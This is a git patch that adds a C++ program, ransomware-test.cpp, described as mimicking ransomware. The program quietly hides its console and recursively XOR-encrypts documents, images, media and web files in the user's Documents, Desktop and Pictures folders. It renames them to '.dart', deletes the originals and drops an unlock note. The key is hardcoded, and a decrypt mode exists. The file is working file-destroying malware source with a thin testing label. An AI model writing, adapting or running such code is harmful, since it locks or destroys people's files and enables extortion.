From e7cae7921944b901e56c442b26a64648e22d9e36 Mon Sep 17 00:00:00 2001
From: Daniel Tam <daniel@danieltam.net>
Date: Tue, 14 Aug 2018 03:06:55 -0500
Subject: [PATCH] Initial commit

---
 ransomware-test.cpp | 162 ++++++++++++++++++++++++++++++++++++++++++++
 1 file changed, 162 insertions(+)
 create mode 100644 ransomware-test.cpp

diff --git a/ransomware-test.cpp b/ransomware-test.cpp
new file mode 100644
index 0000000..dfb6d3b
--- /dev/null
+++ b/ransomware-test.cpp
@@ -0,0 +1,162 @@
+/*
+Info: Cycle through computer encrypting files depending on extension type to mimic ransomware
+        Currently uses XOR encryption
+Compiler: MinGW g++ 8.1.0 (Windows 10)
+Flags: -std=c++14 -static-libgcc -static-libstdc++ -lws2_32 -lboost_system -lboost_filesystem
+Run ex: ransomware-test.exe
+
+TODO:
+*/
+
+#include <iostream>
+#include <fstream>
+#include <string>
+#include <stdlib.h>
+#include <cstddef>
+#include <vector>
+#include <boost/filesystem.hpp>
+#include <boost/algorithm/string.hpp>
+#include <windows.h>
+
+// set the encryption key
+std::string key = "1234567890abcdefghij";
+bool decrypt = false;
+
+// file encryption
+void encryptFile(std::string inFileName)
+{
+    std::string newName;
+    // determine the new name of the file
+    if(decrypt)
+    {
+        std::size_t found = inFileName.find_last_of(".");
+        std::string extension = inFileName.substr(found+1);
+
+        if(extension == "dart")
+        {
+            newName = inFileName.substr(0, found);
+        }
+    }
+    else
+    {
+        newName = inFileName + ".dart";
+    }
+
+    std::size_t found = inFileName.find_last_of("\\");
+    std::string fileName = inFileName.substr(found+1);
+
+    if(fileName != "README TO UNLOCK.txt") // skip if the file is the readme
+    {
+        // XOR encryption
+        std::ifstream inFile;
+        std::ofstream outFile;
+
+        inFile.open(inFileName, std::ios::in | std::ios::binary);
+        std::string str((std::istreambuf_iterator<char>(inFile)), std::istreambuf_iterator<char>()); // Reads a text file into a single string.
+        inFile.close();
+
+        for (unsigned x = 0; x < str.size(); x++) 
+            str[x] ^= key[x % key.size()]; 
+
+        outFile.open(newName, std::ios::out | std::ios::binary);
+        outFile.write(str.c_str(), str.size());
+        outFile.close();
+
+        if(!decrypt) // only delete if we're not decrypting
+            boost::filesystem::remove(inFileName);
+    }
+}
+
+// check listed extensions against known
+bool checkFileExtension(const std::string &fileName)
+{
+    std::size_t found = fileName.find_last_of(".");
+    std::string extension = fileName.substr(found+1);
+    std::vector<std::string> knownExtensions = {"txt", "html", "doc", "docx", "docm", "dotx", "dotm", "xls", "xlsx", "xlsm", "xltm", "pptx", "pptm", "ppt", "pdf", "jpeg", "jpg", "png", "gif", "mp3", "wma",
+                                                "avi", "mkv", "xml", "log", "htm", "css", "js", "php", "ico", "dart"}; // .dart in here for decrypting
+    
+    for(auto const& ext : knownExtensions)
+    {
+        if(boost::iequals(ext, extension))
+        {
+            return true;
+        }
+    }
+    
+    return false;
+}
+
+// drop help file with decryption key in the directory of encrypted files
+void dropHelpFile(const std::string &path)
+{
+    std::size_t found = path.find_last_of("\\");
+    std::string filePath = path.substr(0, found) + "\\README TO UNLOCK.txt";
+
+    if(!boost::filesystem::exists(filePath))
+    {
+        std::ofstream helpFile;
+        helpFile.open(filePath);
+        helpFile << "Unlock code: 1234567890abcdefghij";
+        helpFile.close();
+    }
+}
+
+// recursively find all the files in a directory
+void getAllFilesInDir(const std::string &dirPath)
+{
+    try
+    {
+        if(boost::filesystem::exists(dirPath) && boost::filesystem::is_directory(dirPath))
+        {
+            boost::filesystem::recursive_directory_iterator iter(dirPath);
+
+            boost::filesystem::recursive_directory_iterator end;
+
+            while(iter != end)
+            {
+                if(checkFileExtension(iter->path().string()))
+                {
+                    // start encrypting the file if the extension matches
+                    encryptFile(iter->path().string());
+                    dropHelpFile(iter->path().string());
+                }
+                boost::system::error_code ec;
+                iter.increment(ec);
+            }
+        }
+    }
+    catch (std::system_error & e)
+    {
+
+    }
+}
+
+
+int main(int argc, const char *argv[])
+{
+    // check for decryption mode
+    if (argc > 1)
+    {
+        decrypt = true;
+        std::cout << "mode=decrypt" << std::endl;
+    }
+    else
+    {
+        FreeConsole();
+    }
+    // get the username to start the search
+    std::string username = getenv("USERNAME");
+    std::string userDir = "C:\\Users\\" + username + "\\";
+
+    // User documents directory
+    std::string startDir = userDir + "Documents";
+    getAllFilesInDir(startDir);
+
+    // User desktop directory
+    startDir = userDir + "Desktop";
+    getAllFilesInDir(startDir);
+
+    // User pictures directory
+    startDir = userDir + "Pictures";
+    getAllFilesInDir(startDir);
+}
\ No newline at end of file